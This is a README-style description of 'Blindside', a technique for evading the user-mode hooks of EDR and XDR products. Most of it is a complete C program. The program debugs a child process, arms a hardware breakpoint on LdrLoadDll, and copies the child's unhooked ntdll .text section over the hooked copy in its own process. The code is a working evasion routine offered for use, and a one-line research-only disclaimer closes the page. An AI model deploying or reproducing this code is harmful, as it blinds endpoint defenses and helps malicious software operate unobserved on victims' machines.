Utilizing hardware breakpoints to evade monitoring by Endpoint Detection and Response platforms

CymulateResearch/Blindside
Blindside

Blindside is a technique for evading the user-mode monitoring of endpoint detection and response (EDR) and extended detection and response (XDR) platforms, so that a process can perform operations the platform's hooks would otherwise observe. It uses a hardware breakpoint to halt a debugged child process at a point where ntdll is the only library mapped into it, before the EDR's DLL has been loaded and before any inline hooks have been written into ntdll. A breakpoint handler then reads that clean, unhooked ntdll out of the child and copies it over the hooked ntdll in our own process. Note that this removes only user-mode inline hooks; kernel callbacks, ETW providers and other telemetry that does not depend on those hooks are unaffected.
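As an added example (not code from the Blindside repository), the C program below walks through the procedure described above: start a sacrificial process under our own debugger, arm debug register DR0 on its initial thread, wait for the breakpoint to fire while ntdll is still the only DLL in the child, read the child's `.text` section of ntdll and write it over ours. The PE-parsing and hook-comparison helpers, together with a constructed sample header and a constructed hooked syscall stub, are portable and build on any platform; the debug loop under `_WIN32` does the actual work. Placing the breakpoint on `LdrLoadDll`, and using `notepad.exe` as the victim, are choices made for this example and are not stated by the repository.

```c
/* Added example, not the Blindside repository's own code. Parking the hardware
 * breakpoint on LdrLoadDll is an assumption made here for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Find the .text section of a PE image held at img (headers suffice). Walks the
 * header by raw offsets so it needs no windows.h and can be exercised anywhere. */
int pe_find_text(const uint8_t *img, size_t len, uint32_t *rva, uint32_t *size)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return 0;
    uint32_t pe = rd32(img + 0x3C);                              /* e_lfanew */
    if ((size_t)pe + 24 > len || memcmp(img + pe, "PE\0\0", 4) != 0) return 0;
    uint16_t nsec = rd16(img + pe + 6);                          /* NumberOfSections */
    size_t sec = (size_t)pe + 24 + rd16(img + pe + 20);          /* + SizeOfOptionalHeader */
    for (uint16_t i = 0; i < nsec; i++, sec += 40) {
        if (sec + 40 > len) return 0;
        if (memcmp(img + sec, ".text\0\0\0", 8) == 0) {
            *size = rd32(img + sec + 8);                         /* Misc.VirtualSize */
            *rva  = rd32(img + sec + 12);                        /* VirtualAddress */
            return 1;
        }
    }
    return 0;
}

/* Bytes that differ between the live (possibly hooked) and the clean .text:
 * a non-zero count means an inline hook (or other patch) is present. */
size_t count_hook_bytes(const uint8_t *live, const uint8_t *clean, size_t n)
{
    size_t d = 0;
    for (size_t i = 0; i < n; i++) d += (live[i] != clean[i]);
    return d;
}

/* Constructed sample (not a real binary): one-section PE header whose .text
 * sits at RVA 0x1000 with VirtualSize 0x1234. Returns 1 if pe_find_text agrees. */
int sample_pe_ok(void)
{
    uint8_t buf[512]; uint32_t pe = 0x80, opt = 0xF0, rva = 0, size = 0;
    memset(buf, 0, sizeof buf);
    buf[0] = 'M'; buf[1] = 'Z'; wr32(buf + 0x3C, pe);
    memcpy(buf + pe, "PE\0\0", 4); wr16(buf + pe + 6, 1); wr16(buf + pe + 20, (uint16_t)opt);
    uint8_t *sec = buf + pe + 24 + opt;
    memcpy(sec, ".text\0\0\0", 8); wr32(sec + 8, 0x1234); wr32(sec + 12, 0x1000);
    return pe_find_text(buf, sizeof buf, &rva, &size) && rva == 0x1000 && size == 0x1234;
}

/* Constructed sample: a clean x64 syscall-stub prologue (mov r10,rcx; mov eax,imm32)
 * beside the same bytes with a 5-byte JMP rel32 hook written over them. */
size_t sample_hook_diff(void)
{
    const uint8_t clean[8] = { 0x4C, 0x8B, 0xD1, 0xB8, 0x18, 0x00, 0x00, 0x00 };
    uint8_t live[8]; memcpy(live, clean, 8);
    live[0] = 0xE9; wr32(live + 1, 0x11223344);                 /* jmp rel32 placed by a hook */
    return count_hook_bytes(live, clean, 8);
}

#ifdef _WIN32
#include <windows.h>
/* Run victim under our debugger, halt it with DR0 at LdrLoadDll (assumed to be reached
 * while ntdll is still the only DLL mapped), then copy its clean ntdll .text over ours. */
int blindside_unhook(const char *victim)
{
    STARTUPINFOA si; PROCESS_INFORMATION pi; DEBUG_EVENT ev; char cmd[MAX_PATH];
    memset(&si, 0, sizeof si); si.cb = sizeof si;
    snprintf(cmd, sizeof cmd, "%s", victim);
    if (!CreateProcessA(NULL, cmd, NULL, NULL, FALSE, DEBUG_ONLY_THIS_PROCESS, NULL, NULL, &si, &pi))
        return 0;
    uint8_t *base = (uint8_t *)GetModuleHandleA("ntdll.dll");   /* ntdll shares its base with the child */
    uintptr_t bp = (uintptr_t)GetProcAddress((HMODULE)base, "LdrLoadDll");
    uint32_t rva, size; int ok = 0;
    if (!pe_find_text(base, 0x1000, &rva, &size)) return 0;
    while (WaitForDebugEvent(&ev, INFINITE)) {
        if (ev.dwDebugEventCode == CREATE_PROCESS_DEBUG_EVENT) {
            CONTEXT ctx; memset(&ctx, 0, sizeof ctx);
            ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
            ctx.Dr0 = bp;
            ctx.Dr7 = 1;                    /* L0=1 enables DR0; RW0=00 (execute), LEN0=00 */
            SetThreadContext(pi.hThread, &ctx);
            CloseHandle(ev.u.CreateProcessInfo.hFile);
        } else if (ev.dwDebugEventCode == EXCEPTION_DEBUG_EVENT &&
                   ev.u.Exception.ExceptionRecord.ExceptionCode == EXCEPTION_SINGLE_STEP &&
                   (uintptr_t)ev.u.Exception.ExceptionRecord.ExceptionAddress == bp) {
            /* Breakpoint handler: the child is frozen with a clean ntdll. */
            uint8_t *clean = malloc(size); SIZE_T n; DWORD old;
            if (clean && ReadProcessMemory(pi.hProcess, base + rva, clean, size, &n) && n == size
                && VirtualProtect(base + rva, size, PAGE_EXECUTE_READWRITE, &old)) {
                printf("%zu hooked bytes in ntdll .text\n", count_hook_bytes(base + rva, clean, size));
                memcpy(base + rva, clean, size);
                VirtualProtect(base + rva, size, old, &old);
                ok = 1;
            }
            free(clean);
            TerminateProcess(pi.hProcess, 0);
        } else if (ev.dwDebugEventCode == LOAD_DLL_DEBUG_EVENT) {
            /* A DLL other than ntdll is being mapped before the breakpoint fired: the
             * assumption failed, so abort rather than copy a possibly hooked ntdll. */
            CloseHandle(ev.u.LoadDll.hFile);
            if (!ok && (uint8_t *)ev.u.LoadDll.lpBaseOfDll != base) TerminateProcess(pi.hProcess, 1);
        } else if (ev.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT) {
            ContinueDebugEvent(ev.dwProcessId, ev.dwThreadId, DBG_CONTINUE);
            break;
        }
        ContinueDebugEvent(ev.dwProcessId, ev.dwThreadId, DBG_CONTINUE);
    }
    CloseHandle(pi.hThread); CloseHandle(pi.hProcess);
    return ok;
}

int main(void) { return blindside_unhook("C:\\Windows\\System32\\notepad.exe") ? 0 : 1; }
#endif
```

The `LOAD_DLL_DEBUG_EVENT` branch is the check a practitioner wants: if the loader maps any module other than ntdll before the breakpoint is hit, the "only ntdll is loaded" premise no longer holds for that Windows build, and the example refuses to copy rather than risk importing an already hooked `.text`. Comparing the live and clean sections before overwriting also tells you whether there was anything to unhook at all, which is a useful sanity check on a machine with no EDR present.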

Please note that this technique should only be used for research and testing purposes and should not be used for any illegal or malicious activities. This repository contains the necessary code and instructions for implementing the Blindside technique.
